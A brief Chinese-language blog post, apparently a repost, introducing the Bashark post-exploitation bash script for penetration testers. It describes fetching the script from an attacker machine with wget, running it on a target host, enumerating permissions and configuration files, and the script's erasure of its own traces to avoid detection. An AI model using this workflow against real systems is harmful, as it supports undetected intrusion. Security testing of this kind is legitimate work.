它是由RedCode Labs创建的。Bashark旨在帮助渗透测试人员和安全研究人员在Linux,OSX或Solaris Server的安全评估的后开发阶段。

Bashark比较好的一点是它一个bash脚本,这意味着它可以直接从终端运行而无需任何安装。它速度快,不会使目标计算机过载。它也不需要任何特定依赖项,由于它在执行后抹去了它的存在,因此执行后很难被检测到。在这里,我们使用wget命令下载了Bashark,该命令在攻击者计算机上本地托管。然后使用chmod提供执行权限,然后运行Bashark脚本。它将升级您的Shell,使其能够执行不同的命令。

渗透过程中只要将脚本文件上传到目标主机上运行即可。

执行以下代码运行。

./bashark.sh

在这里,我们使用getperm -c命令查找。Bashark还使用getconf命令枚举了所有常见的配置文件路径。

 

 除了以上一些功能,输入help命令,可以根据个人需求进一步利用。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/690358
推荐阅读
相关标签
  

闽ICP备14008679号